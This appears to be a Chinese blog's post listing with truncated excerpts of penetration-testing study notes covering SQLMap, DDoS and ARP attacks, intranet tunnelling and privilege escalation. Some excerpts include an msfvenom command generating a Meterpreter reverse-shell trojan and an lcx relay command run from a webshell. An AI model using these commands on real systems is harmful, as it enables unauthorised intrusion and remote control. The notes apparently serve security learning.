WARNING: You are using pip version 21.2.3; however, version 21.2.4 is available. You sh...
IP属地:香港
-
-
2020-12-14超详细SQLMap使用攻略及技巧分享sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项...
-
2020-12-11网络安全 | 九个常用的网络命令 ,很实用
一、ping命令 ping是个使用频率极高的实用程序,主要用于确定网络的连通性。这对确定网络是否正确连接,以及网络连接的状况十分有用。简单的说,ping就是一个测试程序,如果...
-
2020-06-02 应急效应流程、病毒分析工具、方法
1、写出应急响应流程并说出应急步骤,每步是怎么操作的 (1)准备阶段:服务需求、合同协议签订、制定方案、人员和工具准备 (2)检测阶段:确定对象和范围、确定方案、检测实施 (...
-
2020-05-29 for循环-关键字-字符串操作一循环结构 while一般用在复杂的逻辑操作for一般用在遍历数据操作中遍历循环迭代都是一个意思,把数据一个个的拿出来# while循环不能遍历集合容器数据 #for循环应用...
-
2020-05-28 代码块学习一、代码块 以冒号作为开始,用缩进来划分作用域,这个征途就是代码块 注意点:indentationerror缩进错误 要么全都是:\t 要么全都是4个空格,不能混...
-
2020-05-25 python学习
一、注释:对代码进行解释,方便阅读代码,解释器不会对其进行编译 1、注释的种类(1)单上注释 # (2)多行注释 ''' """ (1)单行注释如 # print3.x p...
-
2020-05-14 DDOS攻击一、YAN攻击: 不停的发送SYN请求连接,服务器响应SYN-ACK的确认包,攻击者没有返回确认包,而是继续发送请求。(只有2次握手) 二、sockstress攻击实试并写出...
-
2020-05-13 ARP攻击、DOS攻击一、什么是中间人攻击(ARP攻击) 是一种间接的入侵攻击。这种攻击模式是通过各种技术手段,将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为...
-
2020-05-11 内网远程连接一、服务器处于内网如何远程连接 1、通过lcx工具解决内网远程连接 将lcx工具上传上去(如:) Webshell上执行:lcx.exe -slave 自己的公网ip ...
-
2020-05-9第三方应用软件提权一、PCanyWhere安全性测试 PCanyWhere是Symantec(赛门铁克)开发的一套老牌远程控制软件。默认安装路径为C:\Program Files\Symant...
-
2020-05-08 MOF漏洞提权、mssql提权、serv-u、Gene6一、MOF漏洞提权 当可以远程连接时,利用工具提权,新建用户后,不会马上出现,稍等几十秒后就出现新建的用户。 当不能远程连接时,或不想开启远程连接时,我们找一个可写目录,上传...
-
2020-05-07windows uac、mysql udf提权操作、提权常用命令一、完成windowsUAC提权 木马生成: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.103 ...
-
2020-05-06windosws空格提权、linux脏牛提权一、完成windows空格提权 我们可以使用以下命令查看错误配置的路径 wmic service get name,displayname,pathname,startmod...
-
2020-04-30权限提升、获取管理员密码、hash值kali远程连接一、常见提权方法 1、溢出漏洞提权 2、数据库提权 3、第三方软件提权 二、Cmd命令无法执行原因分析 1、Cmd命令无法执行分析 主要原因是cmd.exe被管理员降权或删...
-
2020-04-29后门分析、获取webshell的方法大马后门分析 首先搭建一个木马 将文件拖入虚拟机中 当我们登录的时候输入一个错误的密码,提示非法登录 查看代码,找出关键字,并将代码复制到新记事本中,将execute换成ms...
